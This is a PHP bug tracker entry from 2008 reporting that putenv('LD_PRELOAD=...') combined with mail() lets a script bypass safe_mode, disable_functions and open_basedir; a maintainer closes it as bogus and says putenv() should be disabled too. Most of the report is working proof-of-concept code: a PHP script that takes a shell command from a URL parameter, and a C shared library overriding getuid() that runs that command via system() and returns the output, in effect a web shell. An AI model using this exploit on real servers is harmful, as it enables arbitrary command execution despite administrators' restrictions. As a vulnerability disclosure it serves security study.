ID: 46741
Updated by: [EMAIL PROTECTED]
Reported By: gat3way at gat3way dot eu
-Status: Open
+Status: Bogus
Bug Type: Safe Mode/open_basedir
Operating System: Linux
PHP Version: 5.2.6
New Comment:
You should disable putenv() as well.
Previous Comments:
------------------------------------------------------------------------
[2008-12-03 16:43:19] gat3way at gat3way dot eu
Description:
------------
safe_mode is safe, but the mail() function should check environment
variables IMO.
e.g. you can putenv("LD_PRELOAD=evil_library.so"); and since mail()
calls /usr/bin/mail if your library exports function like getuid() you
can bypass open_basedir restrictions and restrictions on program
execution, etc.
If you need some more info, please contact me at:
[EMAIL PROTECTED]
Milen Rangelov
Reproduce code:
---------------
A PHP script:
<?php
putenv("LD_PRELOAD=/var/www/a.so");
$a=fopen("/var/www/.comm","w");
fputs($a,$_GET["c"]);
fclose($a);
mail("a","a","a","a");
$a=fopen("/var/www/.comm1","r");
while (!feof($a))
{$b=fgets($a);echo $b;}
fclose($a); ?>
A simple library:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int getuid()
{
char *en;
char *buf=malloc(300);
FILE *a;
unsetenv("LD_PRELOAD");
a=fopen("/var/www/.comm","r");
buf=fgets(buf,100,a);
write(2,buf,strlen(buf));
fclose(a); remove("/var/www/.comm");
rename("/var/www/a.so","/var/www/b.so");
buf=strcat(buf," > /var/www/.comm1");
system(buf);
rename("/var/www/b.so","/var/www/a.so");
free(buf);return 0;
}
Expected result:
----------------
execute arbitrary commands even though we have:
disable_functions = dl,system,exec,passthru,shell_exec,popen
open_basedir = /var/www
Actual result:
--------------
The test was successful.
------------------------------------------------------------------------
--
Edit this bug report at http://bugs.php.net/?id=46741&edit=1
